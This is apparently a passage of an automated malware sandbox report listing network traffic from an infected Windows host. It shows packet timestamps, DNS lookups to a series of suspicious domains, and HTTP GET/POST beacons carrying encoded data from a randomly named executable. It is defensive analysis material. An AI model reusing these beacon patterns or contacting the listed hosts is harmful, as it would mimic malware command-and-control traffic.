                                      Aug 26, 2024 18:28:04.999500036 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:05.004147053 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:05.004158974 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:05.004168034 CEST804974337.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:05.004196882 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:05.004225969 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:05.530622005 CEST4974380192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:06.548679113 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:06.554522038 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:06.554599047 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:06.565191984 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:06.569972992 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409416914 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409444094 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409455061 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409512997 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.409531116 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409543991 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409554005 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409564972 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409609079 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.409610033 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.409984112 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.409996033 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.410006046 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.410067081 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.414509058 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.414519072 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.414525986 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.414606094 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.414655924 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.414764881 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.497212887 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497230053 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497240067 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497251034 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497267008 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497277975 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497279882 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.497291088 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497304916 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497314930 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.497317076 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497328043 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497339010 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.497354031 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.497380018 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.497442007 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497453928 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497490883 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.497569084 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497827053 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497836113 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.497872114 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:07.498214960 CEST804974437.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:07.498264074 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:08.077442884 CEST4974480192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:09.096131086 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:09.101483107 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.101588964 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:09.112448931 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:09.117353916 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.117377043 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.117388964 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.117398977 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.117491007 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.117538929 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.117548943 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.117568016 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:09.117789984 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004173040 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004211903 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004229069 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004242897 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004256010 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004268885 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004276991 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.004276991 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.004283905 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004324913 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.004349947 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004379034 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004393101 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.004425049 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.004441023 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.009236097 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.009251118 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.009268999 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.009279966 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.009322882 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.009355068 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.090329885 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.090356112 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.090374947 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.090476036 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.090492964 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.090504885 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.090539932 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.090572119 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.090620041 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.090882063 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.090959072 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.090976954 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.091012001 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.091063976 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.091075897 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.091087103 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.091119051 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.091140032 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.091907978 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.091919899 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.091932058 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.091972113 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.092706919 CEST804974537.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:10.092772007 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:10.624181986 CEST4974580192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:11.642801046 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:11.647903919 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:11.648041964 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:11.655240059 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:11.660130024 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564043045 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564074039 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564085007 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564186096 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564197063 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564208984 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564224005 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564336061 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.564336061 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.564372063 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564383984 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564394951 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.564433098 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.564433098 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.569258928 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.569330931 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.569344997 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.569462061 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.654766083 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.654805899 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.654819012 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.654906988 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.654920101 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655160904 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655177116 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655229092 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655241013 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655263901 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.655263901 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.655284882 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.655777931 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655819893 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655832052 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655850887 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.655894041 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.655941010 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.655953884 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.656018019 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.656658888 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:12.656723022 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.659832954 CEST4974680192.168.2.437.187.158.211
                                      Aug 26, 2024 18:28:12.664587975 CEST804974637.187.158.211192.168.2.4
                                      Aug 26, 2024 18:28:17.697232962 CEST4974780192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:17.702020884 CEST8049747167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:17.702090025 CEST4974780192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:17.715655088 CEST4974780192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:17.720377922 CEST8049747167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:18.223303080 CEST8049747167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:18.223359108 CEST8049747167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:18.223418951 CEST4974780192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:19.218373060 CEST4974780192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:20.242835045 CEST4974880192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:20.247787952 CEST8049748167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:20.247898102 CEST4974880192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:20.258405924 CEST4974880192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:20.265755892 CEST8049748167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:20.732708931 CEST8049748167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:20.733059883 CEST8049748167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:20.733108044 CEST4974880192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:21.764831066 CEST4974880192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:22.786370039 CEST4974980192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:22.791485071 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.791863918 CEST4974980192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:22.803288937 CEST4974980192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:22.808624029 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.808636904 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.808757067 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.808765888 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.808886051 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.808896065 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.808903933 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.808913946 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:22.808922052 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:23.238405943 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:23.280458927 CEST4974980192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:23.331053019 CEST8049749167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:23.331116915 CEST4974980192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:24.311707973 CEST4974980192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:25.330529928 CEST4975080192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:25.335973978 CEST8049750167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:25.336077929 CEST4975080192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:25.344281912 CEST4975080192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:25.349507093 CEST8049750167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:25.802659988 CEST8049750167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:25.802691936 CEST8049750167.172.133.32192.168.2.4
                                      Aug 26, 2024 18:28:25.802948952 CEST4975080192.168.2.4167.172.133.32
                                      Aug 26, 2024 18:28:25.805277109 CEST4975080192.168.2.4167.172.133.32
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 26, 2024 18:27:33.528343916 CEST | 192.168.2.4 | 1.1.1.1 | 0xc78c | Standard query (0) | www.weep.site | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:27:50.127087116 CEST | 192.168.2.4 | 1.1.1.1 | 0xee09 | Standard query (0) | www.88nn.pro | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:03.658237934 CEST | 192.168.2.4 | 1.1.1.1 | 0xc35e | Standard query (0) | www.fontanerourgente.net | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:17.682051897 CEST | 192.168.2.4 | 1.1.1.1 | 0xfd64 | Standard query (0) | www.onlytradez.club | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:30.815356016 CEST | 192.168.2.4 | 1.1.1.1 | 0x1181 | Standard query (0) | www.32wxd.top | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:44.675792933 CEST | 192.168.2.4 | 1.1.1.1 | 0xc471 | Standard query (0) | www.jaxo.xyz | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:58.284194946 CEST | 192.168.2.4 | 1.1.1.1 | 0x2ee6 | Standard query (0) | www.xforum.tech | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:29:12.003802061 CEST | 192.168.2.4 | 1.1.1.1 | 0xc5b8 | Standard query (0) | www.cannulafactory.top | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:29:25.846339941 CEST | 192.168.2.4 | 1.1.1.1 | 0x194a | Standard query (0) | www.taapbit.online | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:29:33.909178972 CEST | 192.168.2.4 | 1.1.1.1 | 0x8feb | Standard query (0) | www.ayypromo.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 26, 2024 18:27:33.562743902 CEST | 1.1.1.1 | 192.168.2.4 | 0xc78c | No error (0) | www.weep.site | weep.site | | CNAME (Canonical name) | IN (0x0001) | false
Aug 26, 2024 18:27:33.562743902 CEST | 1.1.1.1 | 192.168.2.4 | 0xc78c | No error (0) | weep.site | | 194.233.65.154 | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:27:50.136071920 CEST | 1.1.1.1 | 192.168.2.4 | 0xee09 | No error (0) | www.88nn.pro | | 45.157.69.194 | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:04.011404991 CEST | 1.1.1.1 | 192.168.2.4 | 0xc35e | No error (0) | www.fontanerourgente.net | fontanerourgente.net | | CNAME (Canonical name) | IN (0x0001) | false
Aug 26, 2024 18:28:04.011404991 CEST | 1.1.1.1 | 192.168.2.4 | 0xc35e | No error (0) | fontanerourgente.net | | 37.187.158.211 | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:17.695058107 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd64 | No error (0) | www.onlytradez.club | | 167.172.133.32 | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:31.067562103 CEST | 1.1.1.1 | 192.168.2.4 | 0x1181 | No error (0) | www.32wxd.top | 32wxd.top | | CNAME (Canonical name) | IN (0x0001) | false
Aug 26, 2024 18:28:31.067562103 CEST | 1.1.1.1 | 192.168.2.4 | 0x1181 | No error (0) | 32wxd.top | | 206.119.82.116 | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:44.707076073 CEST | 1.1.1.1 | 192.168.2.4 | 0xc471 | No error (0) | www.jaxo.xyz | | 66.29.149.180 | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:28:58.597773075 CEST | 1.1.1.1 | 192.168.2.4 | 0x2ee6 | No error (0) | www.xforum.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:29:12.272011995 CEST | 1.1.1.1 | 192.168.2.4 | 0xc5b8 | No error (0) | www.cannulafactory.top | | 18.183.3.45 | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:29:25.856025934 CEST | 1.1.1.1 | 192.168.2.4 | 0x194a | Name error (3) | www.taapbit.online | none | none | A (IP address) | IN (0x0001) | false
Aug 26, 2024 18:29:34.012881041 CEST | 1.1.1.1 | 192.168.2.4 | 0x8feb | No error (0) | www.ayypromo.shop | | 176.57.64.102 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 194.233.65.154 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:27:33.584745884 CEST | 479 | OUT | GET /v1m8/?3L9l=MbosJJuAq5eUJ0hM82jOLc1IU8MUdjy9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjtrTEBunpF4CO/Z471XhtI61SngqlGgfTsbE=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.weep.site
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Aug 26, 2024 18:27:35.087604046 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:27:34 GMT
                                      Server: Apache
                                      Accept-Ranges: bytes
                                      Cache-Control: no-cache, no-store, must-revalidate
                                      Pragma: no-cache
                                      Expires: 0
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html
                                      Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 45.157.69.194 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:27:50.152690887 CEST | 733 | OUT | POST /l4rw/ HTTP/1.1
                                      Host: www.88nn.pro
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.88nn.pro
                                      Referer: http://www.88nn.pro/l4rw/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
Aug 26, 2024 18:27:51.031419039 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:27:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "667cd175-8a"
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 45.157.69.194 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:27:52.688072920 CEST | 753 | OUT | POST /l4rw/ HTTP/1.1
                                      Host: www.88nn.pro
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.88nn.pro
                                      Referer: http://www.88nn.pro/l4rw/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Ascii: 3L9l=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovhYT7fF77/gcxvF0s2dZyYvK87bTcggw6Y=
Aug 26, 2024 18:27:53.557790995 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:27:53 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "667cd175-8a"
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 45.157.69.194 | 80 | 5356 | C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
Timestamp | Bytes transferred | Direction | Data
Aug 26, 2024 18:27:55.239108086 CEST | 10835 | OUT | POST /l4rw/ HTTP/1.1
                                      Host: www.88nn.pro
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.88nn.pro
                                      Referer: http://www.88nn.pro/l4rw/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
Aug 26, 2024 18:27:56.331223011 CEST | 302 | IN | HTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:27:55 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "667cd175-8a"
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
